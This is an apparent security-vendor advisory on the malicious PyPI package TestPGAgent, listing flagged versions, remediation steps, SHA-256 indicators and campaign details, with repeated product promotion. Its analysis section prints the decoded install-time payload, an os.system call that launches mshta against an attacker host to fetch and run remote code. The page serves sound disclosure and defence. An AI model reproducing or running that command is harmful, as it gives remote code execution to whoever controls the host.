Which versions of TestPGAgent are malicious?

The following PyPI versions of TestPGAgent are flagged malicious: 0.1, 0.2. Treat any of these as compromised.

How do I remediate TestPGAgent if I installed it?

TestPGAgent is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

I already installed TestPGAgent — how do I know if it already compromised me?

If TestPGAgent was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is TestPGAgent part of a known attack campaign?

Yes — TestPGAgent is associated with the IN-MAL-2026-006655, 2026-06-easyaillm campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find TestPGAgent across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for TestPGAgent (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging TestPGAgent across your stack and pipelines.

Malicious package

TestPGAgentPyPI

Malicious code in testpgagent (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5824

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall TestPGAgent

What this malware does

On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This launches Windows mshta.exe against http://fixars.top over plaintext HTTP, fetching and executing an arbitrary HTML-application payload on the installer's machine. The payload is obfuscated with base64+exec to evade casual inspection. The fetch destination is unrelated to any declared publisher, content is unpinned and mutable, and execution is fully attacker-controlled. Any Windows machine running pip install TestPGAgent==0.2 will execute remote code chosen by whoever controls fixars.top at the moment of install.

During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

Downloads and executes a remote executable.
obfuscation
malware
tool:mshta

Malicious versions

2 flagged

0.10.2

Indicators of compromise (SHA-256)

c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f

cc91b82332e104c5788470ba2d3bad983bf7a8d24615c0aa55788877441f6315

716181b28eadded8c97c8523daa795b07ad06a64d705ac88e2e7bed2ce2a496e

d3d68904948d2a20829d60c633af04d71bec824347ef8655781009ff459bf9bb

b2ef252322091e2df68ab6476eb3c3946a39f8d1239e7cdf968fdd4f2c2bfea7

Detection & response playbook

Credential / info stealer

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for TestPGAgent (2 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging TestPGAgent across your stack and pipelines.
If you installed it — respond
TestPGAgent is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If TestPGAgent was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks TestPGAgent before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. TestPGAgent on PyPI has been identified as a malicious package (versions 0.1, 0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0066552026-06-easyaillm

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Detect & block this

O3 blocks TestPGAgent-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Malware detection Runtime egress monitoring